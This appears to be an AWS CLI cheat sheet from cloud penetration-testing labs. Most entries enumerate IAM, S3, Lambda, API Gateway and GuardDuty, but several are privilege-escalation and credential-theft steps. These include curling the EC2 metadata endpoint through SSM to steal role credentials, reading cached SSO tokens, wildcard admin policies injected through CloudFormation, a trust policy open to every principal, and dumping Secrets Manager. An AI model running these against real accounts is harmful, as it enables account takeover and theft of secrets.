notdodo/AWSCLI-Cheat-Sheet.md

## AWSCLI-Cheat-Sheet.md

      
    Raw
  

              AWSCLI-Cheat-Sheet.md
            
          
    AWSCLI Cheat Sheet


Export credentials to be imported in environment shell:
aws configure export-credentials --profile default --format env


List all user in the organization:
aws iam list-users


List all UserName in the organization:
aws iam list-users | ConvertFrom-Json | select -expand Users | select UserName


List groups
aws iam list-groups


List groups for a user
aws iam list-groups-for-user --user-name admin


List all inline policies for a user
aws iam list-user-policies --user-name admin


List attached policy for a user
aws iam list-attached-user-policies --user-name admin


Get the credential report for organization users (and root user)
aws iam get-credential-report --output json | jq -r .Content | base64 -d


List user certificates
aws iam list-signing-certificates --user-name ad-user


Update user's access key
aws iam update-access-key --access-key-id FICACULOTETTE --status Active


List user SSH public keys
aws iam list-ssh-public-keys --user-name ad-user


Download the user SSH public keys
aws iam get-ssh-public-key --user-name ad-user --encoding PEM --ssh-public-key ID <ID>


Get the access token for SSO login:
cat ~/.aws/sso/cache/<GUID>.json |  jq -r .accessToken


Use the access token to get a temporary session token
aws sso get-role-credentials --role-name SECRO --account-id 00111111111 --access-token eyJlbmMiOiJBMjU2R0NNIiwidGFnIjoic0pI...


List hardware MFA devices of the current user
aws iam list-mfa-devices


List virtual MFA devices of the current user
aws iam list-virtual-mfa-devices


List inline policies for a group
aws iam list-group-policies --group-name admin


List attached policies for a group
aws list-attached-group-policies --group-name admin


Get policy information
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess


Get policy content knowing the policy version:
aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --version-id v1


List all policies
aws iam list-policies


List role information
aws iam get-role --role-name ad-loggingrole


List inline policy for a role
aws iam list-role-policies --role-name ad-loggingrole


List attached policies for a role
aws iam list-attached-role-policies --role-name ad-loggingrole


Create a new role from command line:
aws iam create-role --role-name lab-enum --assume-role-policy-document file:///tmp/assume-role-doc.json


Where assume-role-doc.json contains:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "sts:AssumeRole",
      "Condition": {}
    }
  ]
}


Assume a role:
aws sts assume-role --role-arn arn:aws:iam::00111111111:role/LoggingRole --role-session-name assumed


Get the information of the current user:
aws sts get-caller-identity


List all S3 buckets:
aws s3 ls


Attach a managed policy to a user:
aws iam attach-user-policy --user-name student --policy-arn arn:aws:iam::aws:policy/AdministratorAccess


List the login profiles for a user:
aws iam get-login-profile --user-name BobAlice


Create a new login profile for a user
aws iam create-login-profile --user-name BobAlice --password '!QAZ2wsx' --no-password-reset-required


List all policies for a role:
aws iam get-role-policy --role-name Adder --policy-name AddUser


Add a user to a group:
aws iam add-user-to-group --group-name PrintGroup --user-name student


Attach a managed policy to a user:
aws iam attach-group-policy --group-name PrintGroup --policy-arn arn:aws:iam::aws:policy/AdministratorAccess


Create a new policy:
aws iam create-policy-version --policy-arn arn:aws:iam::00111111111:policy/Print --policy-document file://a.json --set-as-default


Where a.json contains:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}


List all roles that matches a specified service:
aws iam list-roles | jq -r '.Roles[] | select( .AssumeRolePolicyDocument.Statement[].Principal.Service | contains("lambda"))'


Create a new Lambda function:
aws lambda create-function --function-name lambdaf --runtime python3.8 --zip-file fileb://lambdaf.zip --handler lambdaf.handler --role arn:aws:iam::00111111111:role/lab11lambdaiam


Execute the lambda function:
aws lambda invoke --function-name lambdaf output.txt


Get the latest AMI image for EC2 instance:
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'


List the subnets for EC2 instances:
aws ec2 describe-subnets


List the security groups for VPCs:
aws ec2 describe-security-groups


List the instance profiles name:
aws iam list-instance-profiles


Create and start an EC2 instance:
aws ec2 run-instances --subnet-id subnet-00111111111 --image-id ami-00111111111 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-00111111111"


Execute a command inside an EC2 instance:
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role/"]' --targets "Key=instanceids,Values=i-00111111111" --comment "Retrieving Access Tokens"s


Retrieve the command of a command execute inside an EC2 instance:
aws ssm get-command-invocation --command-id 928226f8-2c17-4e66-9200-5bd921899996 --instance-id i-00111111111


Create a policy using CloudFormation stack:
aws cloudformation create-stack --stack-name ad-dodo --template-body file://n.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::00111111111:role/lab12CFDeployRole


Where n.json contains:
{
  "Resources": {
    "EvilTemplate": {
      "Type": "AWS::IAM::Policy",
      "Properties": {
        "PolicyName": "admin_policy",
        "PolicyDocument": {
          "Version": "2012-10-17",
          "Statement": [
            {
              "Effect": "Allow",
              "Action": "*",
              "Resource": "*"
            }
          ]
        },
        "Users": ["student"]
      }
    }
  }
}


Update a CloudFormation stack to inject a malicious policy:
aws cloudformation update-stack --stack-name privesc --template-body file://privesc.yaml --capabilities CAPABILITY_NAMED_IAM --region eu-west-1


Where privesc.yaml contains:
Resources:
  PrivEscTemplate:
    Type: "AWS::IAM::ManagedPolicy"
    Properties:
      ManagedPolicyName: AdminAccessPolicy
      Description: Admin access to all AWS res
      Path: "/"
      PolicyDocument:
        Version: "2012-10-17"
        Statement: # allow all
          - Effect: Allow
            Action:
              - "*"
            Resource: "*"
      Roles:
        - RuoloCheFaCose


Get information on the CloudFormation stack status:
aws cloudformation describe-stacks --stack-name ad-dodo


List events of the CloudFormation stack:
aws cloudformation describe-stack-events --stack-name ad-dodo


List the API Gateway account (with quota):
aws apigateway get-account


List all configured REST APIs:
aws apigateway get-rest-apis


Enumerate the resources of a REST API:
aws apigateway get-resources --rest-api-id jojioijijoi


List the configuration for a single API call:
aws apigateway get-method --rest-api-id jojioijijoi --http-method GET --resource-id iouh789hi


List the authorizers used by an API::
aws apigateway get-authorizers --rest-api-id hiuh789hk


List the API keys:
aws apigateway get-api-keys


List GuardDuty detectors:
aws guardduty list-detectors


List GuardDuty filters:
aws guardduty list-filters --detector-id 1dd0e5bfc954bc46fe800952be7e2a69


Get the GuardDuty filter configuration:
aws guardduty get-filter --detector-id 1dd0e5bfc954bc46fe800952be7e2a69 --filter-name test-whitelist


List Lambda functions:
aws lambda list-functions


Get details of a Lambda function:
aws lambda get-function --function-name dictionary-attack


List Lambda function available layers:
aws lambda list-layers


Enumerate a specific Lambda layer:
aws lambda list-layer-versions --layer-name boto3-jinja


Enumerate a specific Lambda layer version:
aws lambda get-layer-version --layer-name boto3-jinja --version-number 1


List all the event sources for a Lambda function:
aws lambda list-event-source-mappings --function-name dictionary-attack


Dump the table of DynamoDB database:
aws dynamodb scan --table-name TABLE_NAME


Dump the content of a secret inside SecretManager:
aws secretmanager get-secret-value --secret-id MySecret


Anonymously enumerate S3 bucket:
aws s3 --no-sign-request --region ap-southeast-1 ls s3://bucket-name


Download a file from S3 bucket anonymously:
aws s3 --no-sign-request --region ap-southeast-1 cp s3://bucket-name/scripts/backup.sh /tmp/backup.sh


List objects inside a bucket:
aws s3api list-objects --bucket NomeBucket


Get bucket policy:
aws s3api get-bucket-policy --bucket NomeBucket | jq -r .Policy | jq


Get the bucket location:
aws s3api get-bucket-location --bucket data-extractor-repo


List object version:
aws s3api list-object-versions --bucket data-extractor-repo


Get the ACL of an object inside a bucket
aws s3api get-object-acl --bucket NomeBucket --key flag


Check the status of a bucket policy (if is present)
aws s3api get-bucket-policy-status --bucket bucket-code


List the bucket public access
aws s3api get-public-access-block --bucket bucket-code


List information about a EKS cluster
aws eks describe-cluster --name clusterName